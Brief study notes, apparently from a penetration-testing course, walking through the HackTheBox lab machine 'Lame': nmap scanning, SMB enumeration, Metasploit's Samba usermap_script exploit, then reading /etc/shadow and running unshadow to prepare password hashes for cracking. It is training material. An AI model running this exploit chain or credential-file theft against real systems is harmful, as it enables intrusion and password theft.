TCM PEH Hacking Lame Notes

HTB Lame

Again, recording commands to derive methodology

nmap -A -T4 -p- 10.10.10.3
OR
nmap -T4 -p- 10.10.10.3
Then
nmap -A -T4 -p21,80,443,etc 10.10.10.3
Is much faster
Noted port 21 anonymous login is allowed
Noted port 139 version
Noted port 445 version
Noted port 3632 version
Noted Ubuntu OS

smbclient -L \\10.10.10.3\
enter
Noted IPC$
Noted Admin$
Noted tmp
smbclient \\10.10.10.3\tmp
enter
ls
dead end
smbclient \\10.10.10.3\opt
and
smbclient \\10.10.10.3\ADMIN$
can’t authenticate, dead end

Googled samba version 3.0.20-debian exploit
Noted rapid7 link
Noted exploit-db link
Read rapid7 link

systemctl postgresql enable
systemctl postgresql start
msfconsole
use exploit/multi/samba/usermap_script
options
set rhost 10.10.10.3
show targets
exploit
whoami
hostname
pwd
cd home
ls
cd …/
ls
locate root.txt
updatedb
locate root.txt
locate user.txt

cat /etc/passwd
cat /etc/shadow
Copy /etc/passwd, paste into file
Copy /etc/shadow, paste into another file
unshadow /path/to/passwd path/to/shadow
See “cracking linux password hashes” videos for more info